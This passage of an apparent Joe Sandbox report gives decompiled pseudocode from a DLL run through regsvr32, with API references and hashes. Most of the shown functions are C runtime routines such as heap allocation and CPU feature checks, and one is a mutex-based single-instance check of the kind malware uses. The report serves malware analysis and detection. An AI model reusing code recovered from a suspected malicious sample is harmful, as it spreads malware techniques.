													_t115 = E6F8495B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6f85cfec - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6F848F5C(1, _t90, 1, _t113);
								E6F849A52();
								E6F849AB3();
								 *0x6f85cfc8 =  *0x6f85cfc8 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6F849492();
								_t67 = E6F8490FE( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6F84949F();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6f85cfc8 = 1;
						if(E6F848EEE(_t132) != 0) {
							E6F849A46(E6F849A87());
							E6F849A64();
							_t80 = E6F84D38A(0x6f8551fc, 0x6f85520c);
							_pop(_t102);
							if(_t80 == 0 && E6F848EC3(1, _t102) != 0) {
								E6F84D345(_t102, 0x6f8551bc, 0x6f8551f8);
								 *0x6f85cfc8 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6F8493D9();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6F849A81();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6F84904D(_t85, _t106, _t121, _t138) != 0) {
									 *0x6f8551b8( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6f85cfec =  *0x6f85cfec + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x6f8492f6
0x6f8492f6
0x6f8492f6
0x6f8492f6
0x6f8492fd
0x6f849304
0x6f849309
0x6f84930c
0x6f8493e3
0x6f8493e3
0x6f8493e3
0x00000000
0x6f849312
0x6f849317
0x6f84931a
0x6f84931c
0x6f84931f
0x6f849323
0x6f84932a
0x6f8493f7
0x6f8493fc
0x6f8493fd
0x6f8493ff
0x6f849404
0x6f849409
0x6f84940e
0x6f849410
0x6f849417
0x6f84941f
0x6f849422
0x6f84942b
0x6f84942e
0x6f849431
0x6f849438
0x6f8494a7
0x6f8494ac
0x6f8494ad
0x6f8494af
0x6f8494b4
0x6f8494b9
0x6f8494bc
0x6f8494be
0x6f8494cf
0x6f8494cf
0x6f8494d3
0x6f8494d6
0x6f8494e2
0x6f8494e2
0x6f8494ef
0x6f8494f1
0x6f8494f4
0x6f8494f6
0x6f849501
0x6f849506
0x6f849508
0x6f84950b
0x6f84950d
0x00000000
0x00000000
0x6f84950d
0x6f8494d8
0x6f8494d8
0x6f8494db
0x00000000
0x6f8494dd
0x6f8494dd
0x6f849513
0x6f849513
0x6f849514
0x6f849515
0x6f849518
0x6f84951d
0x6f84951f
0x6f849522
0x6f849525
0x6f849527
0x6f849529
0x6f84952b
0x6f84952c
0x6f84952d
0x6f849530
0x6f849535
0x6f849537
0x6f849537
0x6f84953d
0x6f84953e
0x6f849543
0x6f849549
0x6f849549
0x6f849529
0x6f84954e
0x6f849550
0x6f849557
0x6f849561
0x6f849563
0x6f849566
0x6f849568
0x6f849574
0x6f84959c
0x6f84959c
0x6f849552
0x6f849552
0x6f849555
0x00000000
0x00000000
0x6f849555
0x6f849550
0x6f8494db
0x6f84959f
0x6f8495a6
0x6f8494c0
0x6f8494c0
0x6f8494c6
0x00000000
0x6f8494c8
0x6f8494c8
0x6f8494c8
0x6f8494c6
0x6f8495ab
0x6f8495b7
0x6f84943a
0x6f84943a
0x6f84943f
0x6f849444
0x6f849449
0x6f849450
0x6f849454
0x6f84945e
0x6f84946a
0x6f84946c
0x6f84946c
0x6f84946e
0x6f849471
0x6f849478
0x6f84947d
0x00000000
0x6f84947d
0x6f849412
0x6f849412
0x6f84947f
0x6f849482
0x6f84948e
0x6f84948e
0x6f849330
0x6f849330
0x6f849341
0x6f849348
0x6f84934d
0x6f84935c
0x6f849362
0x6f849365
0x6f84937a
0x6f849381
0x6f84938b
0x6f84938d
0x6f84938d
0x6f849365
0x6f849390
0x6f849397
0x6f84939e
0x00000000
0x6f8493a0
0x6f8493a5
0x6f8493a7
0x6f8493aa
0x6f8493ac
0x6f8493b5
0x6f8493c3
0x6f8493c9
0x6f8493c9
0x6f8493b5
0x6f8493cb
0x6f8493d3
0x6f8493d3
0x6f8493e5
0x6f8493e8
0x6f8493f4
0x6f8493f4
0x6f84932a

APIs

__RTC_Initialize.LIBCMT ref: 6F849343

Part of subcall function 6F849A46: InitializeSListHead.KERNEL32(6F85D000,6F84934D,6F85A5D0,00000010,6F8492DE,?,?,?,6F849506,?,00000001,?,?,00000001,?,6F85A618), ref: 6F849A4B

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F8493AD

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 37a2584e374576bf1823574d66b7bbef8ccc9afddaf8c63497603829fc23b5b8
Instruction ID: 87716d0d21df0da7be0cb48bc2b2f1b6f70a5fb30d4950c4f788d4c5eab19385
Opcode Fuzzy Hash: 37a2584e374576bf1823574d66b7bbef8ccc9afddaf8c63497603829fc23b5b8
Instruction Fuzzy Hash: 3B21D23264830DBFDFA49BBC960579C3BA1AF0322CF101CDAD4846F1C9DB765054CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F84CC7D Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6F84CC7D(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x6f84cc82

APIs

Part of subcall function 6F84FD93: GetEnvironmentStringsW.KERNEL32 ref: 6F84FD9C
Part of subcall function 6F84FD93: _free.LIBCMT ref: 6F84FDFB
Part of subcall function 6F84FD93: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F84FE0A

_free.LIBCMT ref: 6F84CCBD
_free.LIBCMT ref: 6F84CCC4

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 3c73674de6b33276b548eefa2b705e6ccd362aa9b1f92efc60d5405559ddd177
Instruction ID: 2cc5cd5d279b67e1414580ee01fce8a40c4eb13f82c8aaf6d0fe58f801aa9502
Opcode Fuzzy Hash: 3c73674de6b33276b548eefa2b705e6ccd362aa9b1f92efc60d5405559ddd177
Instruction Fuzzy Hash: 6DE09B7398DA1866E766967D7E40659164E4F8333CB110FDADC10CF2C2EBA4841A41D6

Uniqueness

Uniqueness Score: -1.00%

Function 6F851368 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E6F851368(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E6F84DC48(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E6F84DF9B(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E6F84DC0E(0);
				return _t35;
			}

0x6f85136e
0x6f851375
0x6f85137a
0x6f85137e
0x6f851385
0x6f85138b
0x6f85138b
0x6f851391
0x6f851393
0x6f851396
0x6f851396
0x6f851399
0x6f85139b
0x6f8513a1
0x6f8513a5
0x6f8513aa
0x6f8513ae
0x6f8513b2
0x6f8513b4
0x6f8513b7
0x6f8513bd
0x6f8513c4
0x6f8513c8
0x6f8513cb
0x6f8513ce
0x6f8513ce
0x6f8513d2
0x6f8513d5
0x6f851387
0x6f851387
0x6f851387
0x6f8513d7
0x6f8513e2

APIs

Part of subcall function 6F84DC48: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F84DB5E,00000001,00000364,00000007,000000FF,?,6F84D4C9,?,00000004,?,?,?), ref: 6F84DC89

_free.LIBCMT ref: 6F8513D7

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 848e4589ec0cadd899f29504caf98aaa220363ac6646e292d2934455128d2eb4
Instruction ID: 9d0973cc5f28a0539c9f91d97ad1279df0964e8f569baa60bbb1081ef62a9641
Opcode Fuzzy Hash: 848e4589ec0cadd899f29504caf98aaa220363ac6646e292d2934455128d2eb4
Instruction Fuzzy Hash: AB01D6736047166BD3218F69C8849CDFBA9FB053B0F140AA9E555ABAC0E3B0A811C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F84DC48 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F84DC48(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6f85d9d8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6F850684();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6F84D46D(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E6F84C4BB(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6f84dc4e
0x6f84dc53
0x6f84dc61
0x6f84dc61
0x6f84dc67
0x6f84dc69
0x6f84dc69
0x6f84dc80
0x6f84dc89
0x6f84dc91
0x00000000
0x00000000
0x6f84dc71
0x6f84dc73
0x6f84dc95
0x6f84dc9a
0x6f84dca0
0x00000000
0x6f84dca0
0x6f84dc7c
0x6f84dc7e
0x00000000
0x00000000
0x6f84dc7e
0x00000000
0x6f84dc80
0x6f84dc59
0x6f84dc5f
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F84DB5E,00000001,00000364,00000007,000000FF,?,6F84D4C9,?,00000004,?,?,?), ref: 6F84DC89

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9281a711eb7738d69c7acb2aec8f75760eba54c81e1b624a7f8c1e1590fde03e
Instruction ID: 98b32cdd685fd3f4bb30a816fbe13cbd9c01200d8a4320c756b216e8dcb461dc
Opcode Fuzzy Hash: 9281a711eb7738d69c7acb2aec8f75760eba54c81e1b624a7f8c1e1590fde03e
Instruction Fuzzy Hash: 21F0BB3320472CA7DB159A255908A963B8A9F41774F0489D2EC149F380DBA4E41281E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F848E01 Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6F848E01(signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t54;
				signed int _t55;
				signed int _t59;
				intOrPtr _t72;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t85;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr* _t92;
				signed int _t93;
				intOrPtr* _t97;
				signed int _t103;
				signed int _t109;
				intOrPtr* _t112;
				signed int _t115;
				signed int _t118;
				signed int _t123;
				void* _t125;
				void* _t126;
				void* _t128;

				_t109 = __edx;
				while(1) {
					_push(_a4);
					_t54 = E6F84C544(); // executed
					if(_t54 != 0) {
						return _t54;
					}
					_t55 = E6F84C4BB(__eflags, _a4);
					__eflags = _t55;
					if(_t55 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(_a4 != 0xffffffff) {
							_push(_t125);
							_t125 = _t128;
							_t128 = _t128 - 0xc;
							E6F849606( &_v20);
							E6F84A50C( &_v20, 0x6f85a634);
							asm("int3");
						}
						_push(_t125);
						_t126 = _t128;
						E6F843110( &_v20);
						E6F84A50C( &_v20, 0x6f85a538);
						asm("int3");
						_push(_t126);
						 *0x6f85cff0 =  *0x6f85cff0 & 0x00000000;
						 *0x6f85c010 =  *0x6f85c010 | 0x00000001;
						_t59 = IsProcessorFeaturePresent(0xa);
						__eflags = _t59;
						if(_t59 != 0) {
							_v28 = _v28 & 0x00000000;
							_push(_t89);
							_t112 =  &_v48;
							asm("cpuid");
							_t90 = _t89;
							 *_t112 = 0;
							 *((intOrPtr*)(_t112 + 4)) = _t89;
							 *((intOrPtr*)(_t112 + 8)) = 0;
							 *(_t112 + 0xc) = _t109;
							_v24 = _v48;
							_v20 = _v36 ^ 0x49656e69;
							_v16 = _v44 ^ 0x756e6547;
							_push(_t90);
							asm("cpuid");
							_t92 =  &_v48;
							 *_t92 = 1;
							 *((intOrPtr*)(_t92 + 4)) = _t90;
							__eflags = _v16 | _v40 ^ 0x6c65746e | _v20;
							 *((intOrPtr*)(_t92 + 8)) = 0;
							 *(_t92 + 0xc) = _t109;
							if((_v16 | _v40 ^ 0x6c65746e | _v20) != 0) {
								L17:
								_t115 =  *0x6f85cff4; // 0x2
							} else {
								_t85 = _v48 & 0x0fff3ff0;
								__eflags = _t85 - 0x106c0;
								if(_t85 == 0x106c0) {
									L16:
									_t118 =  *0x6f85cff4; // 0x2
									_t115 = _t118 | 0x00000001;
									 *0x6f85cff4 = _t115;
								} else {
									__eflags = _t85 - 0x20660;
									if(_t85 == 0x20660) {
										goto L16;
									} else {
										__eflags = _t85 - 0x20670;
										if(_t85 == 0x20670) {
											goto L16;
										} else {
											__eflags = _t85 - 0x30650;
											if(_t85 == 0x30650) {
												goto L16;
											} else {
												__eflags = _t85 - 0x30660;
												if(_t85 == 0x30660) {
													goto L16;
												} else {
													__eflags = _t85 - 0x30670;
													if(_t85 != 0x30670) {
														goto L17;
													} else {
														goto L16;
													}
												}
											}
										}
									}
								}
							}
							_t103 = _v40;
							_t72 = 7;
							_v16 = _t103;
							__eflags = _v24 - _t72;
							if(_v24 < _t72) {
								_t93 = _v28;
							} else {
								_push(_t92);
								asm("cpuid");
								_t97 =  &_v48;
								 *_t97 = _t72;
								 *((intOrPtr*)(_t97 + 4)) = _t92;
								 *((intOrPtr*)(_t97 + 8)) = 0;
								_t103 = _v16;
								 *(_t97 + 0xc) = _t109;
								_t93 = _v44;
								__eflags = _t93 & 0x00000200;
								if((_t93 & 0x00000200) != 0) {
									 *0x6f85cff4 = _t115 | 0x00000002;
								}
							}
							_t73 =  *0x6f85c010; // 0x6f
							_t74 = _t73 | 0x00000002;
							 *0x6f85cff0 = 1;
							 *0x6f85c010 = _t74;
							__eflags = _t103 & 0x00100000;
							if((_t103 & 0x00100000) != 0) {
								_t75 = _t74 | 0x00000004;
								 *0x6f85cff0 = 2;
								 *0x6f85c010 = _t75;
								__eflags = _t103 & 0x08000000;
								if((_t103 & 0x08000000) != 0) {
									__eflags = _t103 & 0x10000000;
									if((_t103 & 0x10000000) != 0) {
										asm("xgetbv");
										_v32 = _t75;
										_v28 = _t109;
										_t123 = 6;
										__eflags = (_v32 & _t123) - _t123;
										if((_v32 & _t123) == _t123) {
											_t78 =  *0x6f85c010; // 0x6f
											_t79 = _t78 | 0x00000008;
											 *0x6f85cff0 = 3;
											 *0x6f85c010 = _t79;
											__eflags = _t93 & 0x00000020;
											if((_t93 & 0x00000020) != 0) {
												 *0x6f85cff0 = 5;
												 *0x6f85c010 = _t79 | 0x00000020;
												__eflags = (_t93 & 0xd0030000) - 0xd0030000;
												if((_t93 & 0xd0030000) == 0xd0030000) {
													__eflags = (_v32 & 0x000000e0) - 0xe0;
													if((_v32 & 0x000000e0) == 0xe0) {
														 *0x6f85c010 =  *0x6f85c010 | 0x00000040;
														__eflags =  *0x6f85c010;
														 *0x6f85cff0 = _t123;
													}
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
					} else {
						continue;
					}
					break;
				}
			}

0x6f848e01
0x6f848e13
0x6f848e13
0x6f848e16
0x6f848e1e
0x6f848e21
0x6f848e21
0x6f848e09
0x6f848e0f
0x6f848e11
0x6f848e22
0x6f848e26
0x6f84961e
0x6f84961f
0x6f849621
0x6f849627
0x6f849635
0x6f84963a
0x6f84963a
0x6f84963b
0x6f84963c
0x6f849644
0x6f849652
0x6f849657
0x6f849658
0x6f84965b
0x6f849665
0x6f84966e
0x6f849674
0x6f849676
0x6f84967c
0x6f849682
0x6f849687
0x6f84968b
0x6f84968f
0x6f849690
0x6f849692
0x6f849695
0x6f84969a
0x6f8496a3
0x6f8496b4
0x6f8496bf
0x6f8496c5
0x6f8496c6
0x6f8496cb
0x6f8496ce
0x6f8496d3
0x6f8496d8
0x6f8496db
0x6f8496de
0x6f8496e1
0x6f849726
0x6f849726
0x6f8496e3
0x6f8496e6
0x6f8496eb
0x6f8496f0
0x6f849715
0x6f849715
0x6f84971b
0x6f84971e
0x6f8496f2
0x6f8496f2
0x6f8496f7
0x00000000
0x6f8496f9
0x6f8496f9
0x6f8496fe
0x00000000
0x6f849700
0x6f849700
0x6f849705
0x00000000
0x6f849707
0x6f849707
0x6f84970c
0x00000000
0x6f84970e
0x6f84970e
0x6f849713
0x00000000
0x00000000
0x00000000
0x00000000
0x6f849713
0x6f84970c
0x6f849705
0x6f8496fe
0x6f8496f7
0x6f8496f0
0x6f84972c
0x6f849731
0x6f849732
0x6f849735
0x6f849738
0x6f849769
0x6f84973a
0x6f84973c
0x6f84973d
0x6f849742
0x6f849745
0x6f849747
0x6f84974a
0x6f84974d
0x6f849750
0x6f849753
0x6f849756
0x6f84975c
0x6f849761
0x6f849761
0x6f84975c
0x6f84976c
0x6f849771
0x6f849774
0x6f84977e
0x6f849783
0x6f849789
0x6f84978f
0x6f849792
0x6f84979c
0x6f8497a1
0x6f8497a7
0x6f8497a9
0x6f8497af
0x6f8497b3
0x6f8497b6
0x6f8497b9
0x6f8497c4
0x6f8497c7
0x6f8497c9
0x6f8497cb
0x6f8497d0
0x6f8497d3
0x6f8497dd
0x6f8497e2
0x6f8497e5
0x6f8497ea
0x6f8497f4
0x6f849800
0x6f849802
0x6f849811
0x6f849813
0x6f849815
0x6f849815
0x6f84981c
0x6f84981c
0x6f849813
0x6f849802
0x6f8497e5
0x6f8497c9
0x6f8497af
0x6f8497a7
0x6f849824
0x6f849825
0x6f849828
0x00000000
0x00000000
0x00000000
0x00000000
0x6f848e11

APIs

stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6F849644

Part of subcall function 6F84A50C: RaiseException.KERNEL32(E06D7363,00000001,00000003,6F849657,?,?,?,6F849657,?,6F85A538), ref: 6F84A56C

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: ExceptionRaisestdext::threads::lock_error::lock_error
String ID:
API String ID: 3447279179-0
Opcode ID: b415df77f64cc558b89977c41d85122ddf24359ccc595733f7e152e7bcf57395
Instruction ID: 01dcafc7f5b7b423c5ece68c9f27027e781824f6e68d10fc2840805c63b8bd2a
Opcode Fuzzy Hash: b415df77f64cc558b89977c41d85122ddf24359ccc595733f7e152e7bcf57395
Instruction Fuzzy Hash: C5F0543480830DB6CF14AABCEE4599D776C6A06218B504EE2A934AD1D1FF30E759C5D4

Uniqueness

Uniqueness Score: -1.00%

Function 6F841A60 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6F841A60(void* __ebx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __ebp;
				intOrPtr _t16;
				void* _t23;

				_t23 = __ebx;
				_v12 = _a4 + 0x23;
				_t24 = _v12;
				if(_v12 <= _a4) {
					E6F846DB0();
				}
				_t26 = _v12;
				_t16 = E6F846AF0(_v12); // executed
				_v8 = _t16;
				do {
					if(_v8 == 0) {
						do {
							E6F84C25F(_t23, _t24, _t26, __eflags);
							__eflags = 0;
						} while (0 != 0);
					} else {
					}
					_t24 = 0;
				} while (0 != 0);
				_v16 = _v8 + 0x00000023 & 0xffffffe0;
				 *((intOrPtr*)(_v16 + 0xfffffffffffffffc)) = _v8;
				return _v16;
			}

0x6f841a60
0x6f841a6c
0x6f841a6f
0x6f841a75
0x6f841a77
0x6f841a77
0x6f841a7c
0x6f841a80
0x6f841a85
0x6f841a88
0x6f841a8c
0x6f841a90
0x6f841a90
0x6f841a95
0x6f841a95
0x00000000
0x6f841a8e
0x6f841a99
0x6f841a99
0x6f841aa6
0x6f841ab7
0x6f841ac0

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 6F841A77

Part of subcall function 6F846DB0: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6F846DB9

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
String ID:
API String ID: 2103942186-0
Opcode ID: b76c894fc18651f0dd9a731209d8a28e113a96b5c028739d6e19fc56e693ba99
Instruction ID: 7e95a1b7bff2f997d236814216c31d27611998e55bde1d5c0fdbc204c6d25eb6
Opcode Fuzzy Hash: b76c894fc18651f0dd9a731209d8a28e113a96b5c028739d6e19fc56e693ba99
Instruction Fuzzy Hash: F0F04F74D0050CABCB08DFACC582A9DF7B5AF45348F1089EAD9119F384D730AA90CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6F84E649 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F84E649(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6F84D46D(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6f85d9d8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6F850684();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E6F84C4BB(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6f84e64f
0x6f84e655
0x6f84e687
0x6f84e68c
0x6f84e692
0x00000000
0x6f84e692
0x6f84e659
0x6f84e65b
0x6f84e65b
0x6f84e672
0x6f84e67b
0x6f84e683
0x00000000
0x00000000
0x6f84e663
0x6f84e665
0x00000000
0x00000000
0x6f84e66e
0x6f84e670
0x00000000
0x00000000
0x6f84e670
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6F850272,?,00000000,?,6F84D4C9,?,00000004,?,?,?,?,6F84CFC7), ref: 6F84E67B

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ec2d64e0e6e78fc444defd55f36871d7879f9fd8feff7561e77e12a1cd7372f2
Instruction ID: afc394a5966065c6b1a942908eb170d81dd56113e8d7ff056a6de642c711bced
Opcode Fuzzy Hash: ec2d64e0e6e78fc444defd55f36871d7879f9fd8feff7561e77e12a1cd7372f2
Instruction Fuzzy Hash: C3E02B3124171D67EB10977A5C0479A3A8CAF537B4F020ED29C54DE0C0EB25F810C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8469A0 Relevance: 1.5, APIs: 1, Instructions: 32
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6F8469A0(CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;

				_v8 = E6F842310(0, 0);
				_v12 = CreateMutexA(0, 1, _a4);
				if( *((intOrPtr*)(E6F8423D0(0, 0)))() != 0xb7) {
					return 1;
				}
				_v16 = E6F842700(0, 0);
				_v16(_v12);
				return 0;
			}

0x6f8469af
0x6f8469bd
0x6f8469d0
0x00000000
0x6f8469e9
0x6f8469db
